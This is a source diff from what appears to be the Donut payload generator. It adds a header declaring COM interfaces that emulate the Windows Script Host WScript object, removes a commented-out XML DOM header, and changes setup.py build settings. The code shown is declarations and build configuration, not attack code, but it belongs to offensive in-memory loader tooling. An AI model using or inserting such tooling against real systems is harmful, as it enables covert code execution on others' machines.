20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+0
-588
payload/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
424 IXMLDOMDocument * This,
425 BSTR *prefixString);
426
427 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
428 IXMLDOMDocument * This,
429 BSTR *nameString);
430
431 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
432 IXMLDOMDocument * This,
433 IXMLDOMNode *stylesheet,
434 VARIANT outputObject);
435
436 HRESULT ( STDMETHODCALLTYPE *get_doctype )(
437 IXMLDOMDocument * This,
438 IXMLDOMDocumentType **documentType);
439
440 HRESULT ( STDMETHODCALLTYPE *get_implementation )(
441 IXMLDOMDocument * This,
442 IXMLDOMImplementation **impl);
443
444 HRESULT ( STDMETHODCALLTYPE *get_documentElement )(
445 IXMLDOMDocument * This,
446 IXMLDOMElement **DOMElement);
447
448 HRESULT ( STDMETHODCALLTYPE *putref_documentElement )(
449 IXMLDOMDocument * This,
450 IXMLDOMElement *DOMElement);
451
452 HRESULT ( STDMETHODCALLTYPE *createElement )(
453 IXMLDOMDocument * This,
454 BSTR tagName,
455 IXMLDOMElement **element);
456
457 HRESULT ( STDMETHODCALLTYPE *createDocumentFragment )(
458 IXMLDOMDocument * This,
459 IXMLDOMDocumentFragment **docFrag);
460
461 HRESULT ( STDMETHODCALLTYPE *createTextNode )(
462 IXMLDOMDocument * This,
463 BSTR data,
464 IXMLDOMText **text);
465
466 HRESULT ( STDMETHODCALLTYPE *createComment )(
467 IXMLDOMDocument * This,
468 BSTR data,
469 IXMLDOMComment **comment);
470
471 HRESULT ( STDMETHODCALLTYPE *createCDATASection )(
472 IXMLDOMDocument * This,
473 BSTR data,
474 IXMLDOMCDATASection **cdata);
475
476 HRESULT ( STDMETHODCALLTYPE *createProcessingInstruction )(
477 IXMLDOMDocument * This,
478 BSTR target,
479 BSTR data,
480 IXMLDOMProcessingInstruction **pi);
481
482 HRESULT ( STDMETHODCALLTYPE *createAttribute )(
483 IXMLDOMDocument * This,
484 BSTR name,
485 IXMLDOMAttribute **attribute);
486
487 HRESULT ( STDMETHODCALLTYPE *createEntityReference )(
488 IXMLDOMDocument * This,
489 BSTR name,
490 IXMLDOMEntityReference **entityRef);
491
492 HRESULT ( STDMETHODCALLTYPE *getElementsByTagName )(
493 IXMLDOMDocument * This,
494 BSTR tagName,
495 IXMLDOMNodeList **resultList);
496
497 HRESULT ( STDMETHODCALLTYPE *createNode )(
498 IXMLDOMDocument * This,
499 VARIANT Type,
500 BSTR name,
501 BSTR namespaceURI,
502 IXMLDOMNode **node);
503
504 HRESULT ( STDMETHODCALLTYPE *nodeFromID )(
505 IXMLDOMDocument * This,
506 BSTR idString,
507 IXMLDOMNode **node);
508
509 HRESULT ( STDMETHODCALLTYPE *load )(
510 IXMLDOMDocument * This,
511 VARIANT xmlSource,
512 VARIANT_BOOL *isSuccessful);
513
514 HRESULT ( STDMETHODCALLTYPE *get_readyState )(
515 IXMLDOMDocument * This,
516 long *value);
517
518 HRESULT ( STDMETHODCALLTYPE *get_parseError )(
519 IXMLDOMDocument * This,
520 IXMLDOMParseError **errorObj);
521
522 HRESULT ( STDMETHODCALLTYPE *get_url )(
523 IXMLDOMDocument * This,
524 BSTR *urlString);
525
526 HRESULT ( STDMETHODCALLTYPE *get_async )(
527 IXMLDOMDocument * This,
528 VARIANT_BOOL *isAsync);
529
530 HRESULT ( STDMETHODCALLTYPE *put_async )(
531 IXMLDOMDocument * This,
532 VARIANT_BOOL isAsync);
533
534 HRESULT ( STDMETHODCALLTYPE *abort )(
535 IXMLDOMDocument * This);
536
537 HRESULT ( STDMETHODCALLTYPE *loadXML )(
538 IXMLDOMDocument * This,
539 BSTR bstrXML,
540 VARIANT_BOOL *isSuccessful);
541
542 HRESULT ( STDMETHODCALLTYPE *save )(
543 IXMLDOMDocument * This,
544 VARIANT destination);
545
546 HRESULT ( STDMETHODCALLTYPE *get_validateOnParse )(
547 IXMLDOMDocument * This,
548 VARIANT_BOOL *isValidating);
549
550 HRESULT ( STDMETHODCALLTYPE *put_validateOnParse )(
551 IXMLDOMDocument * This,
552 VARIANT_BOOL isValidating);
553
554 HRESULT ( STDMETHODCALLTYPE *get_resolveExternals )(
555 IXMLDOMDocument * This,
556 VARIANT_BOOL *isResolving);
557
558 HRESULT ( STDMETHODCALLTYPE *put_resolveExternals )(
559 IXMLDOMDocument * This,
560 VARIANT_BOOL isResolving);
561
562 HRESULT ( STDMETHODCALLTYPE *get_preserveWhiteSpace )(
563 IXMLDOMDocument * This,
564 VARIANT_BOOL *isPreserving);
565
566 HRESULT ( STDMETHODCALLTYPE *put_preserveWhiteSpace )(
567 IXMLDOMDocument * This,
568 VARIANT_BOOL isPreserving);
569
570 HRESULT ( STDMETHODCALLTYPE *put_onreadystatechange )(
571 IXMLDOMDocument * This,
572 VARIANT readystatechangeSink);
573
574 HRESULT ( STDMETHODCALLTYPE *put_ondataavailable )(
575 IXMLDOMDocument * This,
576 VARIANT ondataavailableSink);
577
578 HRESULT ( STDMETHODCALLTYPE *put_ontransformnode )(
579 IXMLDOMDocument * This,
580 VARIANT ontransformnodeSink);
581
582 END_INTERFACE
583 } IXMLDOMDocumentVtbl;
584
585 typedef struct _IXMLDOMDocument {
586 IXMLDOMDocumentVtbl *lpVtbl;
587 } XMLDomDocument;*/
+0
-4
setup.cfg less more
0 [egg_info]
1 tag_build =
2 tag_date = 0
3
+36
-12
setup.py less more
0 from setuptools import Extension, setup
0 from setuptools import Extension, setup, sys
11
22 with open("README.md", "r") as fh:
33 long_description = fh.read()
44
5 static_libraries = ['aplib64']
6 static_lib_dir = 'lib'
7 libraries = []
8 library_dirs = ['lib']
9 extra_compile_args = []
10 extra_link_args = []
11 extra_objects = []
12 include_dirs = ['include']
13 sources = ['donut.c',
14 'hash.c',
15 'encrypt.c',
16 'format.c',
17 'loader/clib.c',
18 'donutmodule.c']
19
20 if sys.platform == 'win32':
21 libraries.extend(static_libraries)
22 library_dirs.append(static_lib_dir)
23 extra_objects = []
24 elif sys.platform == 'win64':
25 libraries.extend(static_libraries)
26 library_dirs.append(static_lib_dir)
27 extra_objects = []
28 else: # POSIX
29 extra_objects = ['{}/{}.a'.format(static_lib_dir, l) for l in static_libraries]
30
31
532 module = Extension(
633 "donut",
7 include_dirs=[
8 'include'
9 ],
10 sources=[
11 'donut.c',
